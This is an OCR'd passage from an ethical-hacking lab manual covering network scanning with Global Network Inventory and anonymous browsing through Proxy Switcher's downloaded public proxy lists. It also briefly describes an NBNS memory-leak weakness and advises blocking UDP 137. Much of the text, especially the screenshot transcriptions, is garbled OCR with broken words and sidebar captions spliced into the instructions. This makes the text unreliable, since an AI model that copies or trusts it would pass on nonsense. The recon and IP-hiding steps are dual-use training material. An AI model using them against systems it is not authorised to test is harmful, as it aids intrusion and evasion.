J ‫ ־‬hres-aap f t 2 ‫ ׳‬22/‫׳‬C12 3:36 3B PM (COUNT‫| ) ־‬

name(ftcompany— 3317

for example,
someone@mycom
pany.com

7 o b i 1 its u ;1

Results history depth: Last scan for each address O iip la /e d group: A ll groups

FIGURE 11.15: Global Network Inventory Memory tab

1 7 . I n d i e N etBIO S s e c t io n , c o m p l e t e d e ta ils c a n b e v ie w e d .

C EH Lab Manual Page 195 Ethical Hacking and Countermeasures Copyright O by EC ‫־‬Counc11
All Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

Global Network Inventory ‫ ־‬Unregistered ;-!or

F ie v ie w Son Tools Reports Help

! □ is ? i B i a i a s p 5 ! ■ !a & » B
V*y* results
Mencry ®S Memory device(

Narre 4• Scan 3JTTmarv ♦ S) hitdted«yt*sre Cl nvmmgrt |; & Services

- &I addresses ‫ד‬ Port conrwctre Cl Qf S*drt/M ‫׳‬t«r |."3‫ל‬ Startup ■ Destdop
B-fi‫־‬WORKGROUP logged on
Message subject - 1C.0.C.’ (WIN-D39.
Type the Subject of your 19 1 0 ^ f^ U L Y « ::
message. Global
Network Inventory cannot
post a message that does
zJ Harr l l i n* 0 33* | , ‫י\ ׳‬v F5H. =)E4 (COLNT=3)
not contain a subject
Tir^HatF B/22;2C12 3:3ft 38 FM (COUN T3‫)־‬
*[V/K-039M Ro-LSE4<0>aJ> Lmqj? Woikstatcr Service
X WKC •SMR^LSE4<Ox20S‫־‬ Unque Fie Server Service
3 WORKGROUP <0x00> Group Domain Name

Toid3i.enld

Rea fly Remits history depth ia<t scan ret earn naorett t»< pt»/»d g ro u p : All g ro u p s

FIGURE 11:16: Global Network Inventory NetBIOS tab

18. T h e User Groups ta b s h o w s u s e r a c c o u n t d e ta ils w i t h d i e w o r k g r o u p .

G'obel Network Inventory ‫ ־‬Unregistered I ‫ ־‬1‫ם‬

F ie V ie w Scan Tools Reports Help

[□ E T |E p |g |B ) |• ‫ ־‬IB; * a ■a
□ Name -
2 Conjutasrrf— Q Prccc350ra |^ Marboard I^J) M em ory ‫ מ‬Mcntcrycfcvccs
Specifies HI as a □ *3 $ »‫־‬ccc •I‫־‬: k Vent‫רה‬ Locicoldbks ^ D»sdr>c* ‫ ■י‬Prrtco •> Netted‫־‬,odatfco
the friendly name Narr« m #> CIO‫ כ‬jj] OpcralinqCyslcrr Q n -nvrormont
*i* All address•: 7‫י‬ Q ij0 «• cr J Ctoitup ■ Deaktoo
associated with - i f WORKGROUP ^ Devicc: It#] NetClDC ^ Shares |J? Jxryw A - _bera I, Lojj=dor
your e-mail ? S iiilL
»•ia iJiw N S :‫׳‬
address. When
you send H o s tN c n e ‫־‬/ / * -D39-4R5H L9E4(C OU N T-51

messages, this z i ' rre s c a n p : E /2 2 '2 0 1 2 3:36:38 FM ( COUN5- ‫] ל‬

z i G io jj ^ r w 'is ’rafcr: (C 0U N T =1)
name appears in / / ! S 0 CEN R 5HL3E4'>Adrim$tratoi U5cr occcurt
z i Gr^JD : C K ttK ited CUM Useis (COUN I - 1 1
the From box of W lS-O394R5HL3E4\Ad1rini?trdt01 U ;e 1 accourt
_ J G r» ^ o : Gue:»; C O U N T -1 )
your outgoing Jk• Ul f l r<03‫־‬E M R 5 H L g 5 \ 4 ‫־‬ussl U8#f accourt

messages d C 1 0 * .IIS J U S fiS C O U N T■ !)

% N T >‫ ־‬F \lZcV^cpcrlSc«vor VV«# krcv‫ ׳‬n gtcup oooounl
z i G ro w Pfftavure*1 r g U n i t (COUNT ■1)

TU0I5 i cn|i|

Rsad/ RcsuMts history depth: Lost scan foi each ooaes! Displayed group; All qioupa

FIGURE 11.17: Global Network Inventory User groups section

19. T h e Logged on t a b s h o w s d e ta ile d lo g g e d o n d e ta ils o f d ie m a c h i n e .

C EH Lab Manual Page 196 Ethical Hacking and Countermeasures Copyright O by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

Globa! Network Inventory ‫ ־‬Unregistered 1 - 1‫■ ״ ■ ״‬

Me view 5<ar tools Reports Help

§3-□Is ? Hc1®e/ -•1a & ‫׳״‬

V«w resuKs
J ‫ וג ב‬a id syiefi Q Processors £ Main beard ^ Nenoiy w Memory de/ces
*2 »‫ □ ־־ י‬m \ ^ L > j1 d j s v j Q Di:-•. J . £■ Net ■-.
N e ir c _ m Scansuranaiy ^ BICS |.§) Ooefatro System l£‫ )־‬totaled software | ( | Environment Services |
E % All addresses Port comedo* Q} System slots | Hotfixes ^ S e a it) eerier _J■ 3.< n:u,__H L_2 s5 tlSB_J
S f WORKGROUP C‫־־‬r ■^r . '* {3 0 S 2' Sfia'es > U stty. Users | j> Logged or J
;1dbix7"(wi‫׳‬N-D3g...
& Port ‫ ־‬Specifies ;■ '160.04 (WIN-ULY8...

the port number

you connect to on
your outgoing e- Ho a N o k WH-033NR5HL3E4 (COUNTS

mail (SM TP) 1 NT SERV.CE >MsDisServerl 10

f H” SERVCE'MSSQLFDLounchct
server. This port *, N‫ ־‬S£RVC£\MS$QLSERVER
f N‫ ־‬SERVCE'MSSQLSer/eiOLAPSeiviee
number is usually * , N‫ ־‬SERVCE'RcportScrva
25. £ \A H D39MREHL9E4\A<irnriatral:or 38/22/12 09:01:20

Rod/ Results fcitory depth lost icon lor toch address Oowove^rou^lUroups

FIGURE 11.18: Global Network Inventory Lowed on Section

2 0 . T h e Port connectors s e c t io n s h o w s p o r t s c o n n e c t e d i n d i e n e tw o r k .

ST Globa' Network Inventory - Unregistered

File Scan Toolt Report( Help

1S
vipwr^ui: wax NetBIOS £ Sharps J i. Lfte 1 User* | Logged on
Outgoing mail a ‫ ש‬b # n Fiocessois ^ M<ji1 b0 f J may Memory d evus
(SMTP) ‫ ־‬Specifies your Name L. l-bntcrj £ Logcal disks D: •£‫׳־‬ Networx 0d3?1cr:
Simple Mail Transfer H- All SddtKteS ; c j n c u r r r jr , * WOS |S ) 0p«1fcrg S y r« r ‫—ן‬ Q fcrvronm^nt | S «m :«
f r £* WORKGROUP
Protocol (SMTP) server for Portconnectors JO ^ hrr ‫י‬ a Startup !r j Desktop
■»F ll^ T fMM‫־״‬Di‫־‬9■‫־־־־־‬
outgoing messages
0 ^10 ‫«־‬.(W‫׳‬fW‫׳‬N‫־‬ULY8""

Dorian. V/D^KOROU? (C0UNT=25I

J he*•Hare:t*‫׳‬T.D39MR5HLJ3E4(COUNT-25)
J 1■‫*״‬ttaro : &'22/2D12 33638 PM (COUNT =26)
’73‫״‬DH SerialPor1S55CAConpattle D69‫־‬.Male
‫ז‬7‫»ככ‬ Keyt»01dPort FS/2
’7ODH MouccPori FS/2
’703H USB &m >
51bus
t7o0 h USB
’70311 UCD *CCOH.blM
,703H USB Aco#st.but
‫ ז‬alal 25 Atris
Fes jts nistory deptn: Last scan foi ecdi cCtite>< Disj ayecl arouo; All aroups

FIGURE 11.19: Global Network Inventory Port connectors tab

2 1 . T h e Service s e c t io n g iv e d i e d e ta ils o f d ie s e r v ic e s in s ta l le d i n d i e m a c h i n e .

C EH Lab Manual Page 197 Ethical Hacking and Countermeasures Copyright O by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

Globa! Network Inventory ‫ ־‬Unregistered R = r

S To create a Me view 5rar Tools Reports Help
new custom ‫ ־‬- $*]‫ ־® בס‬H e p H B ]® e | •-•Eg & ‫׳״‬
report that View re<ufts
Usercroups Jsers
NetBOS
| Loaaedor

includes more *1*9 2 □ m Mainboard ^ D

Memory n Msrrcryde/ces
N e ir c _ | Port cornedas Qf System slots | Hotfixes ^ Secut) center £ Startup ■ Desktoo
than one scan E % All addresses "» — i ' jjjj*
S f W O RKGRO UP
element, click • 1 ‫־‬y 'a a ’7 iw i‘N-D38’‫’ "״‬
M 1• 3 0 .‫ גי‬c t i u Svtte ‫״‬ ig ( 13 :‫ ויין‬u n i c i t | S c r r is o |

choose Reports | ;■ '160.04 (WIN-ULY8...

Configure reports
N»♦ -
from the main z i Domr* V»ORC13RO UP |CDUMI«l4/)
_!J Hcs‫* ׳‬sLan^ WIM^»IR5HL9E4(COUNT■!47|
menu, click zi rr^ an p 3/22!20H 3 3&38FM [COUNT =147)
the Add button on . Ldcte A c x b 2t U pcare S e r/ c e 41loma1‫׳‬e R u fM rg ‫־־‬: 'P?! 1g -a n F ilei [vf‫־‬fc)\Comrmn Fite'iAdobi

, £ p f teanon E>o=r1enee Manual R u m rg C‫ ־‬vV.mdowt\system32\svehott eye •k netsv

the reports dialog, . fcanon Host Helper Service Automatic R j 'i ' i r g C «V.»Klowt\^1srern32\fivch0ftexe •k apphr

customize ^ A p p fc a n o n Identtji Manual S tc ff e d C‫\*־‬fcmdow1\svstem32\svc*r0ft.exe •k Local

A pflcanon Intonation Manual R im r g C »V.m<tem(t\sysiern32\svcf10fr.exe •k netsv
settings as . Apffcrariofi Layer 5 areway Service Manual S iq ^ ie d C ,V,mdowt\S3i5tem32Ulg )=«‫<־‬
A pffcarion M anarjenenr Manual C »\Mn<low?\system32Nsvchotr exe •k n e tw
desired, and click
10taH47 toart:J
the OK button
Rod/ Results fcitory depth lost icon lor to<h address Oowove^rou^lUroups

FIGURE 11J20: Global Network Inventory Services Section

2 2 . T h e Network Adapters s e c t i o n s h o w s d i e Adapter IP a n d Adapter type.

Global Network Inventory ‫ ־‬Unregistered 1‫־‬

Fie view Stan Tools Reports Help

I* ‫״‬ 1 t*g a • □ e v Q 'l l & <

‫׳״‬
'/cwrcsuR; ▼ ‫ ל‬X
^ D c*c« [# J NetBIOS | ^ SK3X3 4■ U3cr<rouF3 JL• Uacn ^ Looocdon
r-l ^ □E $ j| Conputer ‫>־ת‬€*‫ו‬ Q Prooeaaora Mom boane fjj Memory B?1 Memory devices

& A security Narr< y Tort c«m ed oo Q System alots |^ Hotfixes ^ Ccc^rfy eerier j* Startup |H Desktop
B V^l All addr»<«#e H Scan ajrrrcrv ^ 80S |‫׳‬jgj] Cporatrj Syotom IrwUkd •oftwuo B Envtrontnonrt I ‫׳‬J, Sorvcoo
account y ~ * £ WORKGROUP h■ v®00 1- ?‫מ‬ |v
password is ■- m o ‫״‬M ( w n ' u’l ^ " . " ’

created to make
sure that no other
user can log on to
Global Network - Tinettarp: 1rj2>2 3 3 6 : 3 3 3 2 ‫ ־‬FM (COUNT-11
‫ך‬ g • W w iih w lE fo . |P4:BE:D9:C|100.D7 l2552EE.2g|1H.01 [vicreolt |E therrct QIC|N0
Inventory. By
default, Global
Network
Inventory uses a
blank password I otall ren^j

Rea^ ^esujt^jjto^jepth^as^a^o^seJ^ddrts^

FIGURE 11.21: Global Network Inventory Network Adapter tab

L a b A n a ly s is

D o c u m e n t all d i e I P a d d r e s s e s , o p e n p o r t s a n d r u n n i n g a p p lic a tio n s , a n d p r o t o c o l s

y o u d i s c o v e r e d d u r i n g d ie la b .

C EH Lab Manual Page 198 Ethical Hacking and Countermeasures Copyright O by EC ‫־‬Counc11
All Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

T o o l/U tility I n f o r m a tio n C o lle c te d /O b je c tiv e s A c h ie v e d

I P S c a n R a n g e : 1 0 .0 .0 .1 — 1 0 .0 .0 .5 0

S c a n n e d I P A d d r e s s : 1 0 .0 .0 .7 ,1 0 .0 .0 .4

R e s u lt:

■ S can su m m a ry
■ B io s
G lo b a l N e tw o r k
■ M e m o ry
In v e n to ry
■ N e tB IO S
■ U se rG ro u p
■ L ogged O n
■ P o rt c o n n e c to r
■ S e rv ic e s
■ N e tw o rk A d a p te r

PL E A S E TALK T O Y O U R I N S T R U C T O R IF YOU H A V E Q U E S T I O N S
R E L A T E D T O T H I S LAB.

Q u e s t io n s

1. C a n G lo b a l N e tw o r k In v e n to r y a u d it re m o te c o m p u te rs a n d n e tw o rk
a p p lia n c e s , a n d i f y e s , h o w ?

2. H o w c a n y o u e x p o r t th e G lo b a l N e tw o r k a g e n t to a s h a re d n e tw o rk
d ir e c to r y ?

In te r n e t C o n n e c tio n R e q u ire d

□ Yes 0 No

P la tfo rm Supported

0 C lassro om 0 iL a b s

C EH Lab Manual Page 199 Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

A nonym ous B row sing u sin g P roxy

S w itc h e r
Proxy Switcher allowsyou to automatically execute actions; based on the detected
netnork connection.

I C O N K E Y
L a b S c e n a r io
p=7
V a lu a b le
111 t h e p r e v i o u s l a b , y o u g a t h e r e d i n f o r m a t i o n l i k e scan s u m m a ry , N e tB IO S
in f o r m a t io n
d e t a ils , s e r v ic e s r u n n i n g o n a c o m p u t e r , e tc . u s i n g G l o b a l N e t w o r k I n v e n t o r y .
Test your
k n o w le d g e N e tB IO S p r o v id e s p ro g ra m s w ith a u n if o r m set o f c o m m a n d s f o r r e q u e s t in g

d i e l o w e r - l e v e l s e r v ic e s d i a t d i e p r o g r a m s m u s t h a v e t o m a n a g e n a m e s , c o n d u c t
w W e b e x e r c is e
s e s s io n s , a n d send d a ta g ra m s b e tw e e n nodes on a n e tw o r k . V u ln e r a b ility lia s

Q W o r k b o o k r e v ie w been id e n tifie d in M ic r o s o ft W in d o w s , w h ic h in v o lv e s one o f th e N e tB IO S

o v e r T C P /IP ( N e t B T ) s e r v ic e s , t h e N e t B I O S N a m e S e rv e r ( N B N S ) . W it h d iis

s e r v ic e , t h e a tta c k e r c a n fin d a c o m p u t e r ’s I P a d d re s s by u s in g it s N e tB IO S

n a m e , a n d v ic e v e r s a . T h e r e s p o n s e t o a N e t B T n a m e s e r v ic e q u e r y m a y c o n t a in

ra n d o m d a ta fro m th e d e s tin a tio n c o m p u t e r ’s m e m o r y ; a n a tta c k e r c o u ld seek

to e x p lo it th is v u ln e r a b ilit y b y s e n d in g th e d e s tin a tio n c o m p u t e r a N e t B T n a m e

s e r v ic e q u e r y a n d t h e n l o o k i n g c a r e fu lly a t th e re s p o n s e to d e te r m in e w h e t h e r

a n y ra n d o m d a ta f r o m t h a t c o m p u t e r 's m e m o r y is in c l u d e d .

A s a n e x p e r t p e n e t r a t io n te s te r, y o u s h o u ld f o llo w t y p ic a l s e c u r ity p r a c tic e s , t o

b lo c k s u c h In t e r n e t- b a s e d a tta c k s b lo c k th e p o r t 1 3 7 U s e r D a ta g r a m P ro to c o l

(U D P ) a t th e fir e w a ll. Y o u m u s t a ls o u n d e rs ta n d h o w n e tw o rk s a re scanned

u s in g P r o x y S w it c h e r .

L a b O b je c t iv e s

T h is la b w i l l s h o w y o u h o w n e t w o r k s c a n b e s c a n n e d a n d h o w to use P ro x y

S w it c h e r . I t w i l l te a c h y o u h o w to :

■ H id e y o u r IP a d d re s s f r o m th e w e b s ite s y o u v is it

■ P r o x y s e rv e r s w itc h in g f o r im p r o v e d a n o n y m o u s s u r fin g

C E H Lab M anual Page 200 E th ic a l H ackin g and Counterm easures Copyright © by EC-Council
A ll Rights Reserved. Reproduction is Strictly Prohibited.
 M o d u le 0 3 - S c a n n in g N e tw o rk s

L a b E n v ir o n m e n t

T o c a n y o u t th e la b , y o u n e e d :

■ a t D:\CEH-Tools\CEHv8 Module 03 Scanning

P r o x y S w it c h e r is lo c a t e d
Networks\Proxy Tools\Proxy Sw itch er
2 " Tools
■ Y o u c a n a ls o d o w n l o a d t h e la t e s t v e r s io n o f P ro x y W o rk b e n c h fro m
d em o nstrate d in
th is lab are th is l i n k h t t p : / / w w w . p r o x y s w it c h e r . c o m /

a va ila b le in ■ I f y o u d e c id e t o d o w n l o a d t h e la t e s t v e r s io n , t h e n s c r e e n s h o t s s h o w n i n
D:\CEH-
t h e la b m i g h t d i f f e r
Tools\CEHv8
M odule 03 ■ A c o m p u te r r u n n in g W indows Server 2012
S canning
■ A w e b b ro w s e r w ith In te r n e t access
N e tw o rks
■ F o l lo w W iz a r d - d r iv e n in s t a lla t io n s te p s t o in s t a ll Proxy Sw itch er

■ A d m i n i s t r a t i v e p r iv ile g e s t o r u n t o o ls

L a b D u r a t io n

T im e : 1 5 M in u te s

O v e r v ie w o f P r o x y S w it c h e r

P r o x y S w it c h e r a llo w s y o u t o a u t o m a t ic a lly e x e c u te a c tio n s , b a s e d o n th e d e te c te d

n e t w o r k c o n n e c t io n . A s t h e n a m e in d ic a te s , P r o x y S w it c h e r c o m e s w i t h s o m e

d e f a u l t a c t i o n s , f o r e x a m p l e , s e t t i n g p r o x y s e t t in g s f o r I n t e r n e t E x p l o r e r , F i r e f o x ,

a n d O p e ra .

L a b T a s k s
C l A u to m a tic
1. In s t a ll P r o x y W o r k b e n c h i n W indows Server 2012 ( H o s t M a c h in e )
change o f proxy
c o n fig u ra tio n s (or 2. D:\CEH-Tools\CEHv8 Module 03 Scanning
P r o x y S w it c h e r is lo c a t e d a t
any o th e r a ctio n ) Netw orks\Proxy Tools\Proxy S w itch e r
based on n e tw o rk
in fo rm a tio n 3. F o llo w th e w iz a r d - d r iv e n in s t a lla t io n s te p s a n d in s t a ll i t i n a ll p la t f o r m s

o f th e W indow s operating system .

4. T h is la b w i l l w o r k i n th e C E H la b e n v ir o n m e n t - o n W indow s S e rve r
2012, W indow s S e rve r 2008‫ י‬a n d W indow s 7

5. O p e n th e F ir e fo x b r o w s e r in y o u r W indows Server 2012, g o to Tools, and

c lic k Options in d ie m e n u b a r.

C E H Lab M anual Page 201 E th ic a l H ackin g and Counterm easures Copyright © by EC-Council
A ll Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

Google Moiillo Fitefox

colt | HtJp

Qownloatfs CW-I
moderns c m * v ‫*«״‬A
S<* UpS^K.
e •!1• -■cc9u fi *
♦You Images Documents Calendar Mote •
C3 Often different Search Web Developer
Page Info

internet Sign n
Cle«r Recent Ustsr. 01 +“ Sh1ft*IW
connections
require
com pletely
different proxy
server settings G o o g le
and it's a real pain
to change them
m anually Gocgie Search I'm feeling Lucky

6 11
A .««t> ng Piogam m ei Business SolUion* P ir a c y t Te •Google Aboul Google Google com

F IG U R E 121 : F ire fo x o p tio n s tab

6. G o to d ie Advanced p r o file in d i e Options w i z a r d o f F i r e f o x , a n d s e le c t

Network ta b , a n d d ie n c lic k Settings.

Options

‫§י & ם‬ % p * k 3
General Tabs Content Applications Privacy Secuiity S>nc Advanced

General | MetworV j Update | Encryption j

Connection

3‫׳‬k P r o x y S w itc h e r fu lly

Configure how h re fo i connects to the Internet | S g tn g i.

c o m p a tib le w ith In te r n e t
Cached W eb Content
E x p lo r e r , F ir e fo x , O p e ra
Your vreb content cache >scurrently using 8.7 M B of disk space Clear Now
a n d o th e r p ro g ra m s
I I Override a u to m ate cache m anagem ent

Limit cache to | 1024-9] MB of space

Offline Web Content and User Data

You 1 application cache is c jiie n t l/ using 0 bytes 0 1 disk space Clear Nov/

M Tell me when a wefccite aclrt to store Hat* fo r offline uce Exceptions..

The follov/ing tvebsites aie a lowed to store data for offline use

B a r eve..

OK Cancel Help

F IG U R E 1 2 2 F ire fo x N e tw o rk Settin g s

7. S e le c t d i e Use System proxy settings r a d io b u t t o n , a n d c lic k OK.

C E H Lab M anual Page 202 E th ic a l H ackin g and Counterm easures Copyright O by E C ‫־‬Counc11
A ll Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

Connection Settings ‫ייי ־‬

Configure Poxies to Access the Internet

O No prox^

'‫ )־‬Auto-detect proxy settings fo r this network

(•) Use system proxy settings

M a n u a l p roxy co n fig u ra tio n :

f i proxy switcher HTTP 5rojjy: 127.0.0.1

supports following @ U je this prcxy server fo r all protocols
command line
SSLVoxy: 127.0.0.1 P firt
options:
FTP *ro xy. 127.0.0.1 P o rt

-d: Activate direct SOCKS H o s t 127.0.0.1 P o rt

connection O SOCKS v4 ® SOCKS v5

No Pro>y f o r

localhcst, 127.0.0.1

Example: .mozilla.org, .net.nz, 192.168.1.0/24

O Autom atic proxy configuration URL:

Reload

OK Cancel Help

F IG U R E 12.3: F ire fo x C o n n e c tio n Settin g s

8. N o w t o I n s t a ll P r o x y S w it c h e r S ta n d a r d , f o l l o w th e w iz a r d - d r iv e n

in s t a lla t io n s te p s .

9. T o la u n c h P r o x y S w it c h e r S ta n d a r d , g o t o S ta rt m e n u b y h o v e r in g d ie

m o u s e c u r s o r in d ie lo w e r - le ft c o r n e r o f th e d e s k to p .

TASK 1

Proxy Servers
Downloading

F IG U R E 1 2 4 : W m d cK vs S e rv e r 2012 - D e s k to p v ie w

10. C lic k d ie P roxy S w itc h e r S tandard a p p t o o p e n d ie Proxy S w itc h e r

w in d o w .

O R

C lic k P roxy S w itc h e r f r o m d i e T r a y I c o n lis t .

C E H Lab M anual Page 203 E th ic a l H ackin g and Counterm easures Copyright O by EC-Council
A ll Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

A d m in is tra to r ^
S ta rt

Server Windows Google Hyper-V Global

Manager RowerShetl Chrome Marvager Network
£□ Proxy S w itch er Inventory

Fsb W * 91 S I
is free to use
w ith o ut lim itations Compute Control Hyper-V
Panel
for personal and Machine... Centof...

com m ercial use y v 9 K

. Command M021I4 PKKVSw*

Prompt Frefox

v rr *
£«p«- <0 *

Proxy
Checker

CM*up ,‫י‬ .‫►ר‬

F IG U R E 125 : W in d o w s S e rv e r 2012 - A p p s

at* o

‫ם‬ i f th e s e rv e r b e c o m e s
in a c c e s s ib le P r o x y S w itc h e r
s S e rv e r.
Customize... ja te D a ta c e n te r
w ill tr y to fin d w o rk in g
p ro x y s e rv e r ‫ ־‬a re d d is h
^ D p ^ u ild 8400
b a c k g ro u n d w ill b e A /Q \ t— 1 l A r - r ‫ ״‬/ 1‫! ׳‬
d is p la y e d t ill a w o rk in g
p ro x y s e rv e r is fo u n d .

F IG U R E 126 : S e le ct P ro x y S w itc h e r

11. T h e P roxy L is t W izard w ill a p p e a r as s h o w n i n d ie f o llo w in g fig u r e ; c lic k

N ext

C E H Lab M anual Page 204 E th ic a l H ackin g and Counterm easures Copyright O by E C ‫־‬Coundl
A ll Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

Proxy List Wizard

£3 ‫ ־‬P roxy S w itc h e r

ssu pp orts fo r W elcom e to th e Proxy S w itcher
LAN, dialup, VPN
and o th e r RAS Using this wizard you can quickly complete common proxy
list managment tasks.
c o n n e ctio n s
To continue, dick Next

@ Show Wizard on Startup <Back Next > Cancel

F IG U R E 12 7 : P ro x y L is t w iz a rd

1 2 . S e le c t d i e Find N ew Server, Rescan Server, R echeck Dead r a d io b u t t o n

fro m Com m on Task, a n d c lic k Finish.

Proxy List Wizard

Uang this wizard you can qcackly complete common proxy

lot managment tasks

Cick finish to continue.

& ‫ ־‬Proxy
s w itc h in g from Common Tasks
com m and line (•) find New Servers. Rescan Servers. Recheck Dead
(can be used a t O Find 100 New Proxy Servers
logon to O find New Proxy Severs Located in a Specific Country
a u to m a tic a lly s e t O Rescan Working and Anonymous Proxy Servers
co n n e ctio n
se tting s).

0 Show Wizard on Startup < Back Finish Caned

F IG U R E 12.8: S e le c t co m m o n tasks

13. A lis t o f dow nloaded proxy servers w i l l s h o w i n d ie l e f t p a n e l.

C E H Lab M anual Page 205 E th ic a l H ackin g and Counterm easures Copyright O by EC-Council
A ll Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

Proxy Switcher Unregistered ( Direct Connection ] I M

File Edit A ction s V iew Help

Filer Proxy Servers ‫א‬

Roxy Scanner Serve* State ResDDnte Countiy
W h e n P r o x y S w itc h e r
M * New (683) , ? 93.151.160.197:1080 Testino 17082ns H RJSSIAN FEDERATION
is r u n n in g in K u fh A U v e B ‫ &־‬high Aronymsus (0) £ 93.151.1€0.195:108Q Teetirg 17035n« m a RJSSIAN FEDERATION A
m o d e it trie s to m a in ta in SSL (0) 93.150.9.381C80 Testing 15631ns RJSSIAN FEDERATION
w o rk in g p ro x y s e rv e r £ : Bte(O) knnel-113-68vprforge.com Lhtested
c o n n e c tio n b y s w itc h in g to i ‫ מ‬Dead (2871) , f 93 126.111210:80 Lhtested * UNITED STATES
2 Permanently (656?) £ 95.170.181 121 8080 lht*ct*d m a RJSSIAN FEDERATION
d iffe r e n t p ro x y s e rv e r i f
1— Book. Anonymity (301) < ? 95.159 368 ‫ו‬C Lhtested “ SYR;AM ARAD REPUBLIC
c u rre n t d ie s
‫—ן‬-£ 5 ‫ ־‬Pnva!e (15) 95.159.31.31:80 Lhtested — b ‫ ׳‬KAN AKAB KtPUBLIt
V t t Dangerous (597) 95.159 3M 4 80 Lhtested “ SYRIAN ARAB REPUBLIC
f~‫ &־‬My P0‫ *׳‬/ Servere (0) , f 94.59.250 71:8118 Lhtoetod ^ 5 UNITED ARAB EMIRATES
:— PnwcySwitchcr (0) * - ................ __ Lt itcatgd___ C UNITED AR\B EMIRATES

Caned

S te fre State Progress MZ3 Fbu‫»׳‬d

Core PrcxyNet Conpbte 28 kb 1500
wviw.aliveoroxy .com
‫״‬mw .cyberayndrome .net Conpfcte
w!w nrtime.com<

DL
&
F IG U R E 1 2 9 : L is t o f d o w n lo a d e e d P r o s y S e rv e r

14. T o stop d o w n lo a d in g d ie p r o x y s e rv e r c lic k

Proxy Switcher U nregistered ( Direct Connection ) L = Jg ' x 1

File Edit Actions View Help

filer Fox/ Servers «

‫ ־‬Proxy Scanner Serve* Slate Resronte Couriry
♦ N#w (?195) £ 001 147 48 1€‫«»* ־‬tw n«t (Aliv«-$SL) 13810nt J HONG KONG
W h e n a c tiv e p ro x y H \y Aicnymouo (0) £ lml5+1S»-11065.a«vwd» (Alive-SSL) 106Nh* | ITALY r
s e rv e r b e c o m e s in a c c e s s ib le I••••©‫ ׳‬SSL (0) £ 218152.121 184:8080 (Alive-SSL) 12259ns »: REPUBLIC OF KOREA
P r o x y S w itc h e r w ill p ic k | fc?Bte(0) £ 95.211.152.218:3128 (Alive-SSL) 11185ns “ NETHERLANDS
B ~ # Dead (1857) £ 95.110.159.54:3080 (Alive-SSL) 13401ns !IT A LY
d iffe r e n t s e rv e r fro m
=••••{2' Permanently 16844] £ 9156129 24 8)80 (Alive-SSL) 11&D2ns ™ UNITED ARAB EMIRATES
P r o x y S w it c h e r c a te g o r y Basic Anonymity (162) •: REPUBLICOF KOREA
u>4 gpj 1133aneunc co (Alive-SSL) 11610m
I f th e a c tiv e p ro x y s e rv e r is | ^ Private (1) p jf dsd»cr/2'20Jcvonfcrc com: (.*Jive-SSL) 15331ns 5 SWEDEN
c u r r e n tly a l i v e th e j - ‫ &־‬Dangerous \696) 91.144.44.86:3128 (Alive-SSL) 11271ns “ SYRIAN ARAB REPUBLIC
b a c k g ro u n d w ill b e g re e n h ‫ &־‬My Proxy Servers (0J £ 91.144.44.8$:&80‫נ‬ (.Alive-SSL) 11259ns ” SYRIAN ARAB REPUBLIC
- 5 ‫ ׳}־‬ProocySwtcher (0) 92.62.225.13080: ‫ר־‬ (Alive-SSL) 11977ns — CZECH REPUBLIC

Cancel

DsajleJ Keep Ali/e Auto Swtcf‫־‬

108 21.5969:18221 tested 09 (Deod) becousc ccrreoon bmed out

2 ' 3.86.4.103.80 tested as [Deod] because connection lifted 0U
123.30.188.46:2214 tested as [Dead] Decause ccnrecaon tuned out.
68 134253.197 5563tested as [Dead] because connection •jmed out. V

F IG U R E 1 21 0: C lic k o n S ta rt b u tto n

1 5 . C lic k Basic Anonymity i n d ie r i g h t p a n e l; i t s h o w s a lis t o f d o w n lo a d e d

p r o x y s e rv e rs .

C E H Lab M anual Page 206 E th ic a l H ackin g and Counterm easures Copyright O by EC-Council
A ll Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

Proxy Switcher Unregistered ( Direct Connection) | _ ; o ^

File Edit A ctions View Help

£z‫ ־‬W hen running & s►□ x Ia a a K

in A u t o S w i t c h g? Proxy Scanner Server State RespxKe Countiy
j ~ # New (853) , f 91 14444 65 3128 (Alve-SSU 10160ns — Sv RAfi ARAB REPUBI
m ode Proxy B ‫&־‬ Anonymous (0) <f 119252.170.34:80.. (Aive-SSU 59/2rre INDONESIA
S w itc h e r w ill h & SSL(0) , f 114110*4.353128 (Alve-SSL) 10705ns ^ INDONESIA
Bte(0) f 41 164.142.154:3123 (Alve-SSU 12035ns ► )E SOUTH AFRICA
s w itc h a c tiv e ■‫ »־‬-& Dead (2872) ,f 2‫כי‬149101 10? 3128 Alve 11206ns m BRAZIL
Femanently (6925) , f 2D3 66 4* 28C Alvo 10635n • H iT A IV /A M
proxy servers 1513 ■ '‫‘י‬.. . "<<1 ‫־"׳‬ , f 203 254 223 54 8080 (Alve-SSL) 11037ns REPUBLIC OF KOREA
regularly. \— Pnvale (16) <f 200253146.5 8080 Alve 10790ns pg BRAZIL
;—£5 Danoerous (696) <f 199231 211 1078080 (Alve-SSU 10974m
S w itc h in g period \ & My Proxy Sorvoro (0) , f 1376315.61:3128 (Alve-SSU 10892m gq b razil
-■‫־‬ ProxySwltcher (0) i f 136233.112.23128 (Alve-SSU 11115ns ‫ נ ס‬brazil
can be s e t w ith a < 1 ■1

s lid e r fro m 5 Caned

m inu te s to 1 0 Cis^bled Keep Alive AUd Swtd‫־‬

seconds 177 38.179.26 80 tested as [Alwe!
17738.179.26:80 tested as [(Aive-SSU]
119252.170.34:80 tested a< (Alive]
119252.170.34.80 tested as [(Alive-SSL)]

33/32
IS illi& S S itS iS k
F IG U R E 1211: S e le ctin g d o w n lo a d e d P ro x y se rve r fro m B a s ic A n o n y m ity

